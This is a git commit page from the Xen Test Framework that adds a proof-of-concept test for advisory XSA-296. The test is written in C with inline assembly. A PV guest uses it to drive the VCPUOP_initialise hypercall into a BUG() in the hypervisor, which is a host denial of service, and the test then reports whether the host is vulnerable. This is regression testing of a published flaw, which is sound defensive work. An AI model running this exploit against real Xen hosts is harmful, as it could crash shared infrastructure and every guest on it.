]> xenbits.xensource.com Git - xtf.git/commitdiff
XSA-296 PoC
authorAndrew Cooper <andrew.cooper3@citrix.com>
Thu, 11 Apr 2019 15:50:23 +0000 (16:50 +0100)
committerAndrew Cooper <andrew.cooper3@citrix.com>
Thu, 28 Nov 2019 23:24:14 +0000 (23:24 +0000)
Signed-off-by: Andrew Cooper <andrew.cooper3@citrix.com>
docs/all-tests.dox
include/xen/arch-x86/xen-x86_64.h
tests/xsa-296/Makefile [new file with mode: 0644]
tests/xsa-296/extra.cfg.in [new file with mode: 0644]
tests/xsa-296/main.c [new file with mode: 0644]

index f0169bf41fd09f30f6583a3fa07a660f21bd0641..ce04a6ddb310518970333a065628fb9b6b7b4d79 100644 (file)
@@ -138,6 +138,8 @@ non-canonical addresses.
 
 XSA-293 - See @ref test-pv-fsgsbase.
 
+@subpage test-xsa-296 - VCPUOP_initialise DoS.
+
 
 @section index-utility Utilities
 
index 30bc74d7245f6cdd85294645b929dc246ecf2141..b3174e144d7812d5371887a5f318e112ae93690f 100644 (file)
@@ -86,6 +86,16 @@ struct xen_cpu_user_regs {
 #undef __DECL_REG_LO16
 #undef __DECL_REG_HI
 
+static inline unsigned long xen_pfn_to_cr3(unsigned long pfn)
+{
+    return pfn << 12;
+}
+
+static inline unsigned long xen_cr3_to_pfn(unsigned long cr3)
+{
+    return cr3 >> 12;
+}
+
 struct arch_vcpu_info {
     unsigned long cr2;
     unsigned long pad; /* sizeof(vcpu_info_t) == 64 */
diff --git a/tests/xsa-296/Makefile b/tests/xsa-296/Makefile
new file mode 100644 (file)
index 0000000..cc9313d
--- /dev/null
@@ -0,0 +1,11 @@
+include $(ROOT)/build/common.mk
+
+NAME      := xsa-296
+CATEGORY  := xsa
+TEST-ENVS := $(PV_ENVIRONMENTS)
+
+TEST-EXTRA-CFG := extra.cfg.in
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk
diff --git a/tests/xsa-296/extra.cfg.in b/tests/xsa-296/extra.cfg.in
new file mode 100644 (file)
index 0000000..8cfbab9
--- /dev/null
@@ -0,0 +1 @@
+vcpus=2
diff --git a/tests/xsa-296/main.c b/tests/xsa-296/main.c
new file mode 100644 (file)
index 0000000..20d04f4
--- /dev/null
@@ -0,0 +1,173 @@
+/**
+ * @file tests/xsa-296/main.c
+ * @ref test-xsa-296
+ *
+ * @page test-xsa-296 XSA-296
+ *
+ * Advisory: [XSA-296](https://xenbits.xen.org/xsa/advisory-296.html)
+ *
+ * Before XSA-296, Xen used BUG() for format string checking in the hypercall
+ * continuation setup logic.  This BUG() was reachable via the
+ * VCPUOP_initialise hypercall for PV guests.
+ *
+ * To tickle a continuation, we set up the new vCPU's pagetables to require
+ * validation.  With PV-L1TF protections in place, we can force a continuation
+ * by writing the first L1TF-vulnerable PTE for the domain.
+ *
+ * For less buggy (or unprotected) hardware, we have to be a bit more cunning
+ * and (ab?)use the fact we can send ourselves an event by writing into evtchn
+ * 2L block, rather than using a hypercall.
+ *
+ * This leaves a 1-instruction race window where, if Xen takes a real
+ * interrupt, the pending evtchn would be delivered before issuing the
+ * VCPUOP_initialise hypercall.
+ *
+ * For 64bit PV guests, we can actually spot this as a side effect of the
+ * SYSCALL ABI, and restart if it occurs.  For 32bit PV guests, there is no
+ * way to distinguish, so we have to live with the race.
+ *
+ * @see tests/xsa-296/main.c
+ */
+#include <xtf.h>
+
+const char test_title[] = "XSA-296 PoC";
+
+/* Helper for simplifying the 32/64bit differences. */
+#ifdef __i386__
+#define COND(_32, _64) _32
+#else
+#define COND(_32, _64) _64
+#endif
+
+/* Appears in exception frames with RPL0.  Needs RPL3 to use. */
+#define __TEST_CS64 (GDTE_AVAIL0 << 3)
+
+static intpte_t t1[L1_PT_ENTRIES] __page_aligned_bss;
+static intpte_t t2[L1_PT_ENTRIES] __page_aligned_bss;
+static xen_vcpu_guest_context_t vcpu1_ctx = {
+    .flags = VGCF_IN_KERNEL,
+};
+
+void do_evtchn(struct cpu_regs *regs)
+{
+    if ( IS_DEFINED(CONFIG_64BIT) && regs->cs == __TEST_CS64 )
+    {
+        static unsigned int count;
+        extern unsigned long restart[] asm ("restart");
+
+        if ( count++ > 5 )
+            panic("Evtchn livelock\n");
+
+        regs->ip = _u(restart);
+    }
+
+    shared_info.vcpu_info[0].evtchn_upcall_pending = 0;
+    shared_info.vcpu_info[0].evtchn_upcall_mask = 1;
+}
+
+void test_main(void)
+{
+    unsigned long tmp;
+    int rc;
+
+    /* Set up a secondary %cs so we can spot SYSCALL being executed. */
+    if ( IS_DEFINED(CONFIG_64BIT) )
+        update_desc(&gdt[__TEST_CS64 >> 3],
+                    GDTE_SYM(0, 0xfffff, COMMON, CODE, DPL3, R, L));
+
+    /*
+     * Prepare pagetables:
+     *  - vcpu1_ctx.cr3 points at t2, which references t1
+     *  - t2 is an L4 (64bit) or an L3 (32bit)
+     *  - t1 is an L3 (64bit) or an L2xen (32bit)
+     *
+     *  * L4 validation is performed with preemption, but without actually
+     *    checking, so it needs to decend a level before the hypercall will
+     *    hit a contination point.
+     *
+     *  * t1[511] is deliberately chosen as an L1TF-vulnerable PTE, so that if
+     *    PV-L1TF protections are enabled, the hypercall will hit a
+     *    continuation point irrespective of pending event channels.
+     */
+    t1[511] = pte_from_virt(t1, 0);
+    t2[3] = pte_from_virt(t1, PF_SYM(P));
+    vcpu1_ctx.ctrlreg[3] = xen_pfn_to_cr3(virt_to_gfn(t2));
+
+    if ( hypercall_update_va_mapping(
+             _u(t1), pte_from_virt(t1, PF_SYM(AD, P)), UVMF_INVLPG) )
+        return xtf_error("Error trying to remap t1 as read-only\n");
+    if ( hypercall_update_va_mapping(
+             _u(t2), pte_from_virt(t2, PF_SYM(AD, P)), UVMF_INVLPG) )
+        return xtf_error("Error trying to remap t2 as read-only\n");
+
+    /*
+     * Opencoded version of:
+     *
+     *   shared_info.vcpu_info[0].evtchn_upcall_pending = 1;
+     *   shared_info.vcpu_info[0].evtchn_upcall_mask = 0;
+     *   rc = hypercall_vcpu_op(VCPUOP_initialise, 1, &vcpu1_ctx);
+     *
+     * but written with only a single instruction race window between enabling
+     * events and issuing the hypercall.
+     */
+    asm volatile (
+#ifdef __x86_64__
+        /* Set up %cs so we can spot when SYSCALL gets executed. */
+        "restart:"
+        "push $%c[cs];"
+        "push $1f;"
+        "lretq; 1:"
+#endif
+        /*
+         * shared_info.vcpu_info[0].evtchn_upcall_pending = 1;
+         * shared_info.vcpu_info[0].evtchn_upcall_mask = 0;
+         */
+        "movb $1, %[pend];"
+        "movb $0, %[mask];"
+
+        /* rc = hypercall_vcpu_op(VCPUOP_initialise, 1, &vcpu1_ctx); */
+        COND("int $0x82;", "syscall;")
+
+        : [pend] "=m" (shared_info.vcpu_info[0].evtchn_upcall_pending),
+          [mask] "=m" (shared_info.vcpu_info[0].evtchn_upcall_mask),
+          "=a"             (rc),
+          COND("=b", "=D") (tmp),
+          COND("=c", "=S") (tmp),
+          "=d"             (tmp)
+        : "a"              (__HYPERVISOR_vcpu_op),
+          COND("b", "D")   (VCPUOP_initialise),
+          COND("c", "S")   (1),
+          "d"              (&vcpu1_ctx)
+#ifdef __x86_64__
+          , [cs] "i" (__TEST_CS64 | 3)
+#endif
+
+        : "memory"
+#ifdef __x86_64__
+          , "rcx", "r11"
+#endif
+        );
+
+    switch ( rc )
+    {
+    case 0:
+        return xtf_success("Success: " COND("Probably not", "Not")
+                           " vulnerable to XSA-296\n");
+
+    case -ENOENT:
+        return xtf_error("Error: Insufficient vcpus\n");
+
+    default:
+        return xtf_error("Error: unexpected result %d\n", rc);
+    }
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */